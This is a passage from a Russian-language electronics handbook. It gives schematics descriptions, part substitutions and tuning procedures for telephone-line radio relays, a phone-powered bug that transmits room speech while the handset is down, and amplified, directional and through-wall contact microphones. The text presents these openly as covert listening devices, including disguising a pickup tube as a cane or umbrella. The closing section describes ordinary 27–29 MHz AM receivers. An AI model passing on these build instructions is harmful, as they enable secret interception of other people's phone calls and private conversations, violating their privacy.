Нижеприведенная схема имеет много общего со схемой, представленной на рис. 2.29. Основное отличие состоит в том, что частотная модуляция осуществляется не варикапом, а путем изменения параметров транзистора в зависимости от протекающего тока. Радиоретранслятор работает в диапазоне частот 65- 108 МГц и обеспечивает дальность передачи до 200 м. Принципиальная схема передатчика представлена на рис. 2.30.
Задающий генератор выполнен на транзисторе VT1 типа КТ315. Частота генератора определяется параметрами колебательного контура - индуктивностью катушки L1 и емкостью конденсатора С3.
Конденсатор С4 обеспечивает оптимальные условия возбуждения генератора. Дроссели Др1 н Др2 разделяют ВЧ и НЧ составляющие сигнала. С коллектора транзистора VT1 сигнал через конденсатор С2 поступает в антенну. В качестве антенны используется отрезок монтажного провода.
В качестве антенны можно использовать и саму линию связи (рис. 2.31). Для этого ВЧ сигнале коллектора транзистора VT1 через конденсаторы С7 и С8 поступает в точки А и В схемы, соответственно. Конденсатор С2 при этом из схемы исключается. Вместо VD1 можно использовать четыре диода типа КД102, КД510, КД522 и др.
Транзистор КТ315 можно заменить на КТ3102, КТ368 и другие высокочастотные. Катушка L1 намотана на корпусе конденсатора С3 и содержит 4 витка провода ПЭВ 0,5 мм. Дроссели любые с индуктивностью 50-100 мкГн. Настройка аналогична настройке схемы на рис. 2.29.
Телефонный радиоретранслятор большой мощности с ЧМ
Передатчик, собранный по схеме, приведенной на рис. 2.32, обеспечивает большую дальность действия - до З00 м.
Работает он в диапазоне 65-108 МГц с частотной модуляцией. Автогенератор собран по обычной двухтактной схеме на транзисторах VT1 и VT2 типа КТЗ15. Частотная модуляция происходит за счет изменения напряжения в линии и, как следствие, изменения напряжения на базах транзисторов VT1 и VT2. Частота задается параметрами контура L1, С5. При изменении емкости конденсатора С5 в пределах от 8 до 30 пФ диапазон возможного изменения частоты генератора составляет от 65 до 108 МГц, при постоянной индуктивности катушки L1. Дроссель Др1 - любой индуктивности в диапазоне от 50 до 100 мкГн. Катушка L1 наматывается на корпусе подстроечного конденсатора С5 и содержит 4 витка провода ПЭВ 0,5 мм с отводом от середины. Катушка L2 намотана поверх L1 и имеет 2 витка того же провода. В качестве транзисторов VT1, VT2 можно использовать любые высокочастотные транзисторы. Стабилитрон VD2 - на напряжение 6-12 В. От него зависит мощность и диапазон девиации частоты передатчика.
Настройка производится при занятой телефонной линии путем подстройки контура L1, С5.
Радиомикрофон-радиоретранслятор с питанием от телефонной линии
Существуют радиоретрансляторы, которые позволяют прослушивать не только телефонный разговор при снятой трубке, но и разговор в помещении, где они установлены, при положенной трубке. Эти устройства маломощные, т.к. используют питание от линии и не могут потреблять ток более 1 мА. Принципиальная схема такого устройства представлена на рис. 2.33.
Выпрямительный мост VD1 типа КЦ407 подключается параллельно телефонной линии независимо от полярности напряжения в линии. Напряжение в линии при положенной трубке имеет значение около 60 В. Это напряжение прикладывается к блоку питания, который выполнен на микросхеме DA1, резисторе R1, конденсаторе С1 и транзисторах VT1 и VT2. Микросхема DA1 типа КЖ101 представляет собой стабилизатор тока, работающий при напряжениях 1,8-120 В.
Падение напряжения при протекании стабильного тока через нагрузку во время заряда конденсатора С1 ограничено аналогом низковольтного стабилитрона, собранного на транзисторах VT1 и VT2. При положенной трубке устройство работает как радиомикрофон.
Описание схемы радиомикрофона и его настройка приведены в разделе 2.1. При снятой трубке незначительное изменение тока, протекающего через нагрузку - радиомикрофон, вызывает изменение рабочей точки транзистора VT3 и, тем самым, осуществляет частотную модуляцию радиомикрофона .
Транзисторы VT1 и VT2 можно заменить на КТ315 и КТ361 соответственно. Конденсатор С1 с минимальным током утечки.
Настройка источника питания сводится к установке резистором R1 тока, протекающего через нагрузку. Ток в точке А не должен превышать 1,5 мА.
2.3. Акустические микрофоны и преобразователи
Микрофоны, как известно, преобразуют энергию звукового сигнала в электрический сигнал. В совокупности со специальными усилителями и фильтрующими элементами они могут быть использованы в качестве устройств, позволяющих получать необходимую информацию. Для этого, например, может быть создана скрытая проводная линия связи, обнаружить которую можно лишь физическим поиском, либо проводя контрольные измерения сигналов во всех проводах, имеющихся в помещении. Естественно, что методы радиоконтроля, эффективные для поиска радиопередатчиков, в данном случае не имеют смысла.
Кроме перехвата непосредственно звуковых колебаний, некоторые микрофоны, так называемые микрофоны-стетоскопы, могут очень хорошо воспринимать разнообразные звуки, распространяющиеся по строительным конструкциям здания. Их используют для прослушивания помещений сквозь стены, двери, открытые окна и форточки.
Для получения информации, идущей только с одного направления, используются узконаправленные микрофоны. В простейших из них узкая диаграмма направленности формируется за счет использования длинной трубки и микрофона, установленного в ней. Трубка маскируется под трость или зонт. В более сложных конструкциях могут использоваться несколько трубок различной длины - это так называемый микрофон органного типа. Такой микрофон способен улавливать звуки голоса на расстоянии до 1000 метров. Высокую направленность имеют также микрофоны, в которых диаграмма направленности формируется параболическим концетратором звука. Ниже приведены схемы и описания некоторых конкретных устройств.
Чувствительный микрофон с усилителем на малошумящих транзисторах
Конструирование чувствительных усилителей для прослушивания речи имеет свои особенности. Одна из практических схем микрофонного усилителя приведена на рис. 2.34.
Это устройство содержит двухкаскадный усилитель низкой частоты на малошумящих транзисторах VT1 и VT2, корректирующий фильтр на транзисторе VT3 и оконечный усилитель, собранный по двухтактной бестрансформаторной схеме, на транзисторах VT4-VT6. Акустическое усиление сигнала звуковой частоты, приведенным устройством составляет 85 дБ, начальный ток потребления - 1,8 мА, полоса усиливаемых частот - от 0,3 до 3 кГц, максимальный выходной уровень сигнала - 124 дБ.
Сигнал с микрофона М1 типа "Сосна" через конденсатор С1 поступает на базу транзистора VT1. Поскольку чувствительность усилителя звуковой частоты ограничена внутренними шумами транзисторов, то для уменьшения шумов в первых каскадах усилителя использованы малошумящие транзисторы типа КТ3102.
Усилительные каскады на транзисторах VT1 и VT2 охвачены глубокой отрицательной обратной связью, которая позволяет обеспечить устойчивую работу каскадов и более линейную АЧХ. Нагрузкой второго каскада усилителя является перемеяный резистор R3, он же является и регулятором громкости. Сложный RС-фильтр, состоящий из элементов R3, С5, R6, С6, R7, С7 отсекает "шумовые" ВЧ составляющие, принимаемые микрофоном, и оставляет только сигналы в полосе частот до 4 кГц. Этот диапазон обеспечивает наибольшую разборчивость речевой информации.
С выхода фильтра сигнал поступает на оконечный усилитель звуковой частоты, выполненный на транзисторах VT4, VT5 типа КТ315 и транзисторе VT6 типа КТЗ61. Нагрузкой усилителя служит головной телефон типа ТМ-2А или ТЭМ. Резисторы в схеме используются типа МЛТ-0,125. Резистор R3- СПЗ-41 или другой небольших габаритов.
Настройка устройства сводится к подбору сопротивлений резисторов R1 и R16 для установки напряжения в точках А и В равным половине напряжения питания.
Микрофон для обнаружения слабых акустических сигналов на специализированной микросхеме
В отличие от предыдущего устройства, собранного на дискретных элементах, предлагаемое устройство собрано на широко распространенной микросхеме типа К237УН1 и предназначено для обнаружения слабых акустических сигналов. Принципиальная схема устройства приведена на рис. 2.35.
В схеме использован электретный микрофон типа МКЭ-333. Сигнал с микрофона М1 поступает на вход микросхемы DA1 типа К237УН1, которая представляет собой усилитель низкой частоты. Усилитель включен по типовой схеме. Транзисторы VT1 типа КТ315 и VT2 типа КТ361 выполняют роль эмиттерных повторителей и служат для усиления сигнала по току. В качестве нагрузки используется телефон типа ТМ-2А.
Настройка усилителя звуковой частоты заключается в получений максимальной мощности сигнала на выходе микросхемы DA1 путем измене ния сопротивления резистора R3. Сопротивление резистора R3 подбирают таким, чтобы при номинальном напряжении питания 9 В и отсутствии сигнала звуковой частоты на входе микросхемы DA1 потенциал на выводе 1 микросхемы DA1 находился в пределах 3,75-3,85 В.
В случае неустойчивой работы усилителя, его самовозбуждения, необходимо между выходом микрофона М1 и конденсатором С2 включить резистор сопротивлением 2-68 кOм.
Устройство работоспособно в диапазоне питающих напряжений 3-9 В, потребляемый при этом ток составляет 2-6 мА. Вместо микрофона возможно подключение многовитковой катушки индуктивности. Она подключается между точками А и В схемы. Микрофон М1 и резисторы при этом отключаются. В последнем случае возможна регистрация переменных магнитных полей.
Направленный микрофон органного типа
Необходимо помнить, что микрофонный усилитель усиливает звуки, приходящие со всех сторон, и, если соотношение сигнал/шум будет недостаточным, нужно применять пространственные направляющие системы - (направленные микрофоны). В этом случае дистанционное звуковое прослушивание ведется с помощью дистанционно направленных микрофонов, имеющих очень узкую диаграмму направленности. С помощью такого микрофона можно прослушать разговор на расстоянии до 1 км в пределах прямой видимости и имеет место принцип: "поблизости никого нет, но тем не менее вас хорошо прослушивают". Использование явления резонанса звуковых волн в направленных системах приводит к увеличению уровня сигнала зауковой энергии, который поступает в микрофон.
Простой направленный микрофон представляет собой набор из семи алюминиевых трубок диаметром 10 мм. Длина трубки определяет резонансную частоту звукового сигнала. Формула для расчета длины трубок имеет следующий вид:
L = 330/2F,
где L - длина трубки в метрах; F - резонансная частота в герцах.
Исходя из вышеприведенной формулы, можно построить табл. 2.1, где N - номер трубки.
Таблица 2.1. Характеристики трубок направленного микрофона
N |
1 |
2 |
3 |
4 |
5 |
6 |
7 |
L,мм |
550 |
400 |
300 |
200 |
150 |
100 |
50 |
F,Гц |
300 |
412 |
550 |
825 |
1100 |
1650 |
3300 |
Вариант размещения избирательной системы, составленной из направленных трубок, приведен на рис. 2.36.
Микрофон располагается в параболическом улавливателе, фокусом которого является направляющая система (рис. 2.37).
Дальнейшее усиление сигнала происходит за счет использования высокочувствительного микрофонного усилителя МУ. Этот направленный микрофон перекрывает диапазон частот от 300 Гц до 3300 Гц, т. е. основной информационный диапазон речевого сигнала.
Если необходимо получить более качественное восприятие речи, то необходимо расширить диапазон принимаемых частот. Это можно сделать путем увеличения количества резонансных трубок, например, до 37 штук. В табл. 2.2 приведены расчетные данные для использования в избирательной системе от 1 до 37 трубок.
Приведенная в табл. 2.2 резонансная система перекрывает диапазон частот от 180 Гц до 8200 Гц. Вариант размещения резонансных трубок приведен на рис. 2.38, где трубки располагаются "улиткой".
Вместо резонансной системы можно использовать параболический рефлектор диаметром от 30 до 80 см.
Таблица 2.2. Расчетные данные для использования в избирательной системе от 1 до 37 трубок
N |
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
L,мм |
920 |
895 |
870 |
845 |
820 |
792 |
770 |
745 |
720 |
695 |
670 |
645 |
F,Гц |
180 |
184 |
190 |
195 |
201 |
208 |
214 |
222 |
229 |
237 |
246 |
256 |
N |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
L,мм |
620 |
595 |
570 |
545 |
520 |
495 |
470 |
445 |
420 |
395 |
370 |
345 |
F,Гц |
266 |
277 |
290 |
303 |
317 |
333 |
351 |
371 |
393 |
418 |
446 |
478 |
N |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
L,мм |
320 |
295 |
270 |
245 |
220 |
195 |
170 |
145 |
120 |
95 |
70 |
45 |
20 |
F,Гц |
516 |
560 |
611 |
674 |
750 |
846 |
971 |
1138 |
1375 |
1737 |
2357 |
3667 |
8250 |
Выносной микрофон с питанием от линии связи
Дистанционная передача информации возможна при использовании проводных линий связи, которые соединяют выносной чувствительный микрофон и оконечный усилитель. Поскольку выходной сигнал, снимаемый непосредственно с микрофона, имеет небольшую амплитуду, то передавать его по линии связи просто нецелесообразно. Это связано с тем, что на длинных соединительных проводах навалятся разного рода помехи, имеющие зцачительную амплитуду. Чтобы передавать сигнал по этим проводам, его необходимо усилить до некоторой величины. Для усиления сигнала используется чувствительный микрофонный усилитель, расположенный в непосредственной близости с микрофоном. Питание такого усилителя осуществляется по проводам линии связи.
Ниже приведена схема выносного микрофона с питанием от линии связи. В устройстве используется динамический или электромагнитный микрофон. Коэффициент усиления по напряжению усилителя, собранного по схеме рис. 2.39, составляет около 3500.
Передача сигнала может осуществляться на десятки и сотни метров. Сигнал с микрофона М1 поступает на усилитель, собранный на транзисторах VT1, VT2 и VT3. Между выходом и входом усилителя введена отрицательная обратная связь по напряжению, образованная резисторами R1, R2, R3 и конденсатором С1. При этом начальный ток, протекающий через усилитель по цепи плюс источника питания, резистор R7, постоянен и зависит от напряжения источника питания и сопротивления нагрузочного резистора R7. Сигнал, усиленный усилителем, вызывает изменение выходного тока усилителя, что приводит к изменению напряжения на нагрузке. Это напряжение поступает на усилитель звуковой частоты через конденсатор С2.
Усилитель звуковой частоты может быть использован любой. Резистор R6 нужен для согласования внутреннего сопротивления микрофонного усилителя с сопротивлением линии связи. Выпрямительный мост VD1 типа КЦ407 необходим для предотвращения выхода устройства из строя вследствие ошибочного подключения источника питания.
Транзистор VT4, включенный по схеме "аналога" стабилитрона, предотвращает скачки напряжения на усилителе в момент подключения питания. Кроме того, он позволяет получить симметричное ограничение выходного сигнала при перегрузках усилителя, что исключает появление четных гармоник, особенно неприятных для слухового восприятия.
В устройстве используются резисторы типа МЛТ-0,125 (кроме R6 и R7). Транзисторы VT1, VT4 могут быть типа КТ315, КТ312, КТ201, КТ342, КТ3102. Транзистор VT2 - КТ361, КТ345, КТ3107. Транзистор VT3 - КТ608, КТ603, КТ630, КТ626, КТ940. Диодный мост VD1 можно заменить четырьмя диодами типа КД102, КД103.
Настройка сводится к установке необходимого коэффициента усиления путем подбора сопротивления резистора R3. При изменении сопротивления резистора R3 от 0 до 20 ком можно получить коэффициент усиления от 3500 до 10.
Питание усилителя осуществляется от источника постоянного тока напряжением от 12 до 60 В. Ток, протекающий через устройство, не должен выходить за пределы 0,5-60 мА. Его значение устанавливается подбором сопротивления R7.
Если сопротивление обмотки электромагнитного или динамического микрофона М1 по постоянному току менее 600 Ом, то его желательно включить в цепь эмиттера транзистора VT1. В качестве линии связи используется экранированный-или обычный провод. В последнем случае провода желательно свить между собой.
Малогабаритный выносной микрофон с низким питающим напряжением
Схема, приведенная на рис. 2.40, в отличие от описанной выше, работает при более низком питающем напряжении.
Выносная часть устройства имеет малые размеры. Длина соединительного кабеля составляет 15-30 м.
Устройство разделено на две части. Одна из них собрана на транзисторе VT1 типа КТ315 по схеме с общим коллектором, а вторая на транзисторе VT2 по схеме с общим эмиттером. Сигнал, снимаемый с электретного микрофона с усилителем типа МКЭ-3, поступает на базу транзистора VT1. Нагрузкой этого каскада служит резистор R3, расположенный во второй части устройства. Это сопротивление необходимо для обеспечения питания входного каскада на транзисторе VT1 при минимальном количестве соединительных проводов. Сигнал, снимаемый с резистора R3, через конденсатор С3, поступает на усилитель звуковой частоты, собранный на транзисторе VT2 типа КТ315.
Обе части устройства соединены экранированным проводом. Причем, отрицательное напряжение источника питания и сигнал звуковой частоты поступают по центральной жиле провода, а положительное напряжение поступает по оплетке.
В качестве микрофона М1 можно использовать любой электретный микрофон с усилителем. Транзистор VT1 типа КТ315 лучше заменить малошумящим транзистором КТ3102. Резисторы в схеме - типа МЛТ-0,125. В качестве источника питания используется аккумуляторная батарея на напряжение 6-9 В.
Настройка устройства заключается в установке режимов работы транзисторов VT1, VT2 путем подбора сопротивлений резисторов R2 и R4, соответственно. При этом ток коллектора каждого транзистора должен быть 0,1-0,2 мА.
Выносной микрофон с усилителем, обеспечивающим дальность передачи сигнала до 100 метров
Это устройство является улучшенным вариантом предыдущего. Оно позволяет предавать сигнал на расстояние до 100 м. Изменения в предлагаемой схеме касаются микрофонного блока. Схема устройства приведена на рис. 2.41.
Транзистор VT1 типа КТ361, на базу которого через конденсатор С2 поступает сигнал с микрофона М1, вместе с резисторами R2-R4 образует однокаскадный микрофонный усилитель. Транзистор VT2 типа КТ315 является эмиттерным повторителем и выполняет функцию динамической нагрузки первого каскада. Ток, потребляемый микрофонным усилителем, не превышает 0,4-0,5 мА, так что его можно питать от источника питания усилителя звуковой частоты.
Усилитель работоспособен в интервале питающих напряжений 3-9 В. Резисторы устройства применяются типа МЛТ-0,125. Микрофон М1 - любой электретный микрофон со встроенным усилителем. Вместо транзисторов VT1 и VT2 можно использовать транзисторы типа КТ3107 и КТ3102 соответственно.
Настройка усилителя звуковой частоты состоит в установке путем подбора сопротивления резистора R3 возможно большего напряжения выходного сигнала.
Соединение микрофонного блока с основным выполняется экранированным проводом, но возможно использование и обычного провода или провода типа "лапша". При использовании длинного соединительного кабеля наблюдается ухудшение качества воспроизведения сигнала из-за больших наводок на проводах.
Выносной микрофон с питанием от трехпроводной симметричной линии связи
Как уже говорилось ранее, кабели, связывающие микрофон с основным усилителем звуковой частоты, очень часто становятся источником дополнительных шумов. Снижение уровня полезного сигнала, которое, как правило, происходит на соединительном кабеле большой длины, можно компенсировать усилителем звуковой частоты, но при этом одновременно будут усилены и шумы.
В отличие от приведенных выше схем, ниже описана схема устройства с передачей сигнала по симметричной линии. В этом случае шумы на уровне усиленного сигнала маскируются в большей степени.
Принципиальная схема микрофонного усилителя приведена на рис. 2.42.
Сигнал, снимаемый с микрофона М1 типа МКЭ-3, "Сосна", поступает на усилитель, собранный на транзисторе VT1. Коэффициент передачи каскада, выполненного на транзисторе VT1, приблизительно определяется соотношением сопротивлении резисторов R3 и R4. Сигнал, усиленный транзистором VT1, поступает на базу транзистора VT2. А так как фаза сигнала на коллекторе транзистора VT2 противоположна фазе сигнала на эмиттере, то и сигнал, поступающий в линию, тоже противофазный. Входной каскад правой части схемы, собранный на транзисторах VT3, VT4, представляет собой сумматор со сдвигом фазы на 180°. Таким образом, противофазный полезный сигнал складывается в фазе и на выходе образуется полезный сигнал с удвоенной амплитудой. А возникающие одинаковые по фазе шумы и помехи в каждом из проводов линии взаимно уничтожаются в сумматоре. Суммарный сигнал подается на базу транзистора VT5 типа КТ361. Этот каскад имеет коэффициент усиления 4. С нагрузки этого каскада, резистора R12, сигнал подается на оконечный усилитель звуковой частоты или магнитофон.
В устройстве используются резисторы типа МЛТ-0,125. Транзисторы VT1-VT3 могут быть типа КТ315 и КТ342, транзисторы VT4, VT5 - КТ361, КТ3107. В качестве микрофона М1 может быть использован любой электретный микрофон со встроенным усилителем.
Настройка усилителя заключается в подборе сопротивления резистора R7. При этом необходимо контролировать напряжения, указанные на принципиальной схеме.
Для подключения выносного микрофона необходим экранированный кабель с двумя внутренними жилами.
Микрофонный усилитель с дифференциальным входом
Такой недостаток, как питание выносного микрофона по трем проводам, можно устранить. Ниже приведена схема с двухпроводной соединительной линией, имеющая лучшие выходные характеристики, чем выше описанная. За основу взята схема, представленная на рис. 2.41. В качестве предварительного усилителя используется дифференциальный операционный усилитель. Принципиальная схема устройства приведена на рис. 2.43.
Работа выносного микрофона (левая часть схемы) подробно изложена при описании работы схемы рис. 2.41. Остановимся на подробном описании правой части схемы. Основу правой части схемы представляет операционный усилитель DA1 типа КР1407УД2, включенный по схеме дифференциального усилителя. Он представляет собой малощумящпй операционный усилитель с малым током потребления. Схема имеет коэффициент ослабления синфазных входных напряжений около 100 дБ. Это свойство и используется для подавления помех, наводимых в проводах и имеющих синфазный характер. Полезный сигнал и помеха снимаются с нагрузочных резисторов R6 и R7 и через конденсаторы С3 и С4 поступают на инвертирующий и неинвертирующий входы микросхемы DA1 соответственно. Вследствие этого сигнал помехи ослабляется в микросхеме на 100 дБ. Полезный звуковой сигнал усиливается операционным усилителем в 10 раз. Коэффициент усиления сигнала можно изменять путем изменения сопротивления резисторов R8 и R9. Увеличение их номиналов приводит к увеличению коэффициента усиления, определяемого как отношение R8/R4 (R9/R5). Сигнал, усиленный микросхемой, с выхода 6 через конденсатор С6 поступает на основной УЗЧ или магнитофон.
Резисторы R10, R11 и конденсатор С5 создают искусственную среднюю точку, в которой напряжение равно половине напряжения источника питания. Это обусловлено тем, что для питания устройства используется однополярное питание, а для нормальной работы операционного усилителя необходимо двухполярное питание. Резистор R13 устанавливает необходимый ток потребления микросхемы. Микросхему DA1 можно заменить на КР140УД1208. Но возможно и применение любого другого операционного усилителя, включенного по типовой схеме со своими Цепями коррекции. Резистор R13 в этом случае из схемы исключается.
При исправных деталях устройство начинает работать без дополнительных регулировок. Увеличить (уменьшить) усиление можно подбором сопротивлений R8 и R9.
Если левую часть схемы заменить схемой, приведенной на рис. 2.44, а из правой части убрать резисторы R6 и R7, то можно записывать на магнитофон телефонный разговор при снятой телефонной трубке.
Микрофон-стетоскоп
Наряду с узконаправленнымн и проводными выносными микрофонами, существуют устройства, которые регистрируют вибрационные колебания стен, потолков, стекол, вентиляционных шахт и т. л. Эти устройства называются микрофоны-стетоскопы. Они представляют собой довольно сложные устройства. Поэтому ниже описано устройство, которое может служить прообразом микрофона-стетоскопа, и принцип его работы. Принципиальная схема устройства приводится на рис. 2.45.
Усилитель звуковой частоты собран на микросхеме DA1 типа К140УД6. Резисторы R1 и R2 задают режим работы микросхемы. Коэффициент усиления определяется значением сопротивления резистора R3. Транзисторы VT1 типа КТ315 и VT2 типа КТ361 включены по схеме эмиттерных повторителей и усиливают выходной сигнал по току. Нагрузкой усилителя служат головные телефоны ТЭМ-2.
Датчик вибрации делается из пьезокерамической головки В1, снятой со старого проигрывателя. Виброколебания преобразуются пьезадатчиком в электрические и усиливаются усилителем DA1. В качестве пьезодатчика В2 можно применить пьезоизлучатель типа ЗП-1, ЗП-22 и им подобные от электронных часов и игрушек. Они хорошо воспроизводят частоты в диапазоне 800-3000 Гц, что, в основном, перекрывает речевой диапазон частот.
При необходимости можно усилить сигнал до нужной величины, используя дополнительный усилитель звуковой частоты. Сигнал на него поступает с выхода операционного усилителя DA1. Подобный датчик может быть с успехом использован и в качестве датчика охранной сигнализации. В качестве пьезодатчика В1 можно использовать, например, ПЭ-1, ГЗП-308 и другие.
2.4. Приемные устройства оповещения и сигнализации
Описанные выше устройства - радиопередатчики и радиоретрансляторы - не могут быть эффективно использованы без приемного устройства. Для того, чтобы их целенаправленно использовать, они должны работать совместно со специальным радиоприемным устройством. В этой главе приводятся принципиальные схемы и подробные описания некоторых радиоприемных устройств. Особое внимание при выборе схем было уделено таким техническим характеристикам устройств, как высокая чувствительность, простота изготовления, минимально возможное количество деталей, простая настройка и др. При этом радиоприемники разделены по ряду признаков или особенностей их использования и изготовления. Описание начинается с приемников диапазона 27-29 МГц, работающих с амплитудной и частотной модуляцией. Далее приведен раздел с описанием радиоприемных
устройств, работающих в диапазоне 65-108 МГц. Отдельно рассмотрены радиоприемные устройства более высокочастотного диапазона. Один из разделов данного параграфа включает в себя описание радиоприемных приставок и конвертеров на различные радиочастотные диапазоны.
Предлагаемые радиоприемные устройства могут быть использованы не только для работы с радиопередатчиками, но и в различных приемных трактах: трактах радиостанций, охранных сигнализаций и в системах дистанционного управления.
Печатные и монтажные платы устройств не приводятся по коммерческим соображениям, они изготавливаются самостоятельно, в зависимости от используемых деталей, габаритных размеров и так далее.
2.4.1. Радиоприемные устройства AM сигналов высокой чувствительности
Данное радиоприемное устpойство позволяет принимать амплитудно-модулированные сигналы в диапазоне 27-29 МГц. Оно обладает высокой чувствительностью - не хуже 0,5 мкВ/м при соотношении сигнал/шум 3/1. Избирательность по соседнему каналу при расстройке на 9 кГц - не хуже 30 дБ. Ток потребления при средней громкости - около 30 мА. Принципиальная схема радиоприемника приведена на рис. 2.46.
С антенны сигнал поступает на входной контур L1, С2, выделяющий полосу частот принимаемого сигнала. Выделенный высокочастотный сигнал с отвода катушки L1 поступает на базу транзистора VT2, входящего в состав каскадного смесителя. На эмиттер этого же транзистора с отвода катушки L3 поступает сигнал гетеродина, который собран на транзисторе VT4. Частота сигнала гетеродина задается параметрами частотозадающего контура L3, С9. Перестройка гетеродина осуществляется конденсатором переменной емкости С9. Частота гетеродина должна отличаться от частоты принимаемого сигнала на величину промежуточной частоты, в данном случае - на 465 кГц.
Каскадный смеситель, собранный на транзисторах VT1 и VT2, выполнен по схеме ОЭ-ОБ. Благодаря этому смеситель имеет большое выходное сопротивление, что позволяет включить контур L2, С6, настроенный на промежуточную частоту, в коллекторную цепь транзистора VT1. Режимы работы транзисторов смесителя по постоянном токе определяются сопротивлением резисторов R1 и R2. С выхода смесителя сигнал промежуточной частоты цоступает на вход эмиттерного повторителя, собранного на транзисторе VT3. Он согласует высокое выходное сопротивление смесителя с низким входным сопротивлением пьезокерамического фильтра ZQ1. Фильтр ZQ1 определяет селективность по соседнему каналу. Он нагружен на согласованную нагрузку, функцию которой выполняет резистор R7. С этой нагрузки напряжение промежуточной частоты (ПЧ) поступает на вход двухкаскадного каскадного усилителя ПЧ, выполненного на транзисторах VT5-VT8. В каскадных усилителях используются схемы на транзисторах разной структуры с включением их по схеме OK - ОБ. Режим работы транзисторов определяется сопротивлением резисторов R8, R9, R11, R12.
Детектор приемника выполнен на диоде VD1, который нагружен на высокое входное сопротивление эмиттерного повторителя на транзисторе VT11. Постоянная составляющая базового напряжения этого транзистора смещает рабочую точку диода VD1 в прямом направлении и поддерживает ее в начале криволинейного участка вольт-амперной характеристики, что обеспечивает лучшее детектирование слабых сигналов, а следовательно и более высокую чувствительность, чем обычный детектор. С нагрузки эмиттерного повторителя VT11 продетектированный низкочастотный сигнал поступает на регулятор громкости, выполненный на резисторе R19, и далее на усилитель звуковой частоты .
Приемник имеет эффективную систему автоматической регулировки усиления (АРУ). Для работы системы АРУ используется напряжение ПЧ, снимаемое с коллектора транзистора VT7. Положительные волны этого напряжения поступают в цепь базы транзистора VT10, который при повышении уровня входного сигнала, а следовательно и сигнала ПЧ, открывается. Это приводит к закрытию транзистора VT9, в результате чего уменьшается напряжение на эмиттере этого транзистора, одновременно снижается и напряжение питания смесителя и первого каскада УПЧ, что приводит к уменьшению усиления этих каскадов. Цепь, состоящая из R17 и VD3, служит для создания на аноде VD2 положительного напряжения, смещающего рабочую точку транзистора VT1O в сторону наибольшей чувствительности, тем самым компенсируя затухание, вносимое резистором R15.
Усилитель звуковой частоты приемника выполнен по типовой схеме на транзисторах VT12-VT14 и особенностей не имеет. Нагрузкой усилителя служит малогабаритный громкоговоритель В1 с сопротивлением катушки не менее 8 Ом или головные телефоны.
В радиоприемнике используются резисторы типа МЛТ-0,125, электролитические конденсаторы типа К50-6, К50-16 или К50-35, подстроечные конденсаторы типа КПК, конденсатор С9 желательно использовать с воздушным диэлектриком, пьезокерамический фильтр ZQ1 типа ФП1П-061-08 или ФП1П-026 с частотой настройки 465 кГц. Для намотки катушек используются полистироловые каркасы с надстроечными сердечниками из феррита 100НН диаметром 2,8 мм и длиной 14 мм. Катушки L1 и L3 имеют по 20 витков провода ПЭВ 0,18 мм. Отвод у катушки L1 сделан от 7 витка, считая от заземленного вывода. У катушки L3 отвод сделан от 1 витка. Катушка контура ПЧ L2 наматывается на стандартном четырехсекционном каркасе и помещается в трубчатый ферритовый магнитопровод из феррита марки 400НН, сердечник - из того же материала. Катушка L2 содержит 120 витков провода ПЭВ 0,12 мм.
Настройку приемника следует начинать с усилителя звуковой частоты. Подбором сопротивления резистора R21 станавливается напряжения в точке соединения эмиттеров транзисторов VT13, VT14. Оно должно быть равным половине напряжения источника питания. Напряжение на электродах транзисторов каскадов ПЧ н АРУ устанавливается подбором сопротивлений резисторов в цепи базы при отсутствии входного сигнала и отключенном гетеродине. Необходимые значения напряжений в вольтах приведены в табл. 2.3.
Таблица 2.3. Значения напряжений на выводах транзисторов
vt1 |
vt2 |
vt3 |
vt5 |
vt6 |
vt7 |
vt8 |
vt9 |
vt10 |
vt11 |
|
Uk |
3.5 |
1.5 |
3.5 |
3.5 |
5.5 |
|||||
Uэ |
2.5 |
1.0 |
1.0 |
5.5 |
2.3 |
Контур L2, C6 настраивается на частоту ПЧ - 465 кГц. Входной контур настраивается на середину принимаемого диапазона. Приемник можно использовать совместно с радиопередатчиками, имеющими кварцевую стабилизацию частоты. Для этого используют несколько фиксированных настроек. Это достигается изменением схемы гетеродина (рис. 2.47).
Вместо конденсатора переменной емкости С9 устанавливается подстроечный конденсатор. Кварцевый резонатор ZQ2 включается между коллектором и базой транзистора VT4. Частота кварца ZQ2 должна отличаться от частоты кварца передатчика на значение ПЧ, равное 465 кГц. При использовании нескольких кварцованных передатчиков в гетеродине приемника необходимо использовать соответствующее число кварцевых резонаторов, которые подключаются при помощи переключателя.
Радиоприемное устройство AM сигналов с фиксированной настройкой частоты
В отличие от предыдущего, предлагаемое устройство имеет более простое схемное решение. Приемник работает в диапазоне 27-29 МГц с амплитудной модуляцией. Чувствительность - около 4 мкВ/м. Селективность по соседнему каналу - 26 дБ. Приемник имеет фиксированную настройку на один или несколько каналов. Принципиальная схема радиоприемника приведена на рис. 2.48.
Принятый сигнал выделяется контуром L1, С2 и усиливается усилителем высокой частоты, выполненным на транзисторе VT1. На транзисторе VT2 выполнен преобразователь частоты с совмещенным гетеродином и кварцевой стабилизацией частоты гетеродина кварцем ZQ1. Усиленный сигнал с коллектора VT1 смешивается с сигналом гетеродина. В результате на коллекторе транзистора VT2 формируется сигнал промежуточной частоты. Сигнал ПЧ выделяется пьезокерамическим фильтром ZQ2 с частотой настройки 465 кГц и усиливается двухкаскадным усилителем промежуточной частоты, собранным на транзисторах VT3, VT4. Детектор приемника выполнен на диодах VD1, VD2. С детектора сигнал поступает на систему АРУ, состоящую из цепи R8, С8, R10, а также через регулятор громкости R13 на усилитель звуковой частоты, аналогичный приведенному на рис. 2.46.
Диоды VD1 , VD2 могут быть типа Д18,ГД507. Пьезокерамический фильтр ZQ2 может быть любой с частотой настройки 465 кГц. Дроссели Др1, Др2 намотаны на резисторах МЛТ-0,25 сопротивлением более 100 ком. Каждый имеет по 100 витков провода ПЭВ 0,1.
Конструкция катушки L1 аналогична предыдущему описанию, она содержит 13 витков провода ПЭВ 0,23 с отводом от 3 витка.
Настройку начинают с установки токов коллекторов транзисторов VT1-VT4. Ток коллектора VT1 (0,6 мА) устанавливается подбором сопротивления резистора К1. Токи коллекторов VT2-VT4 устанавливаются подбором сопротивлений резисторов RЗ, R7, R11, соответственно, равными 1, 0,5 и 0,05 мА.
Радиоприемное устройство AM сигналов на специальной микросхеме
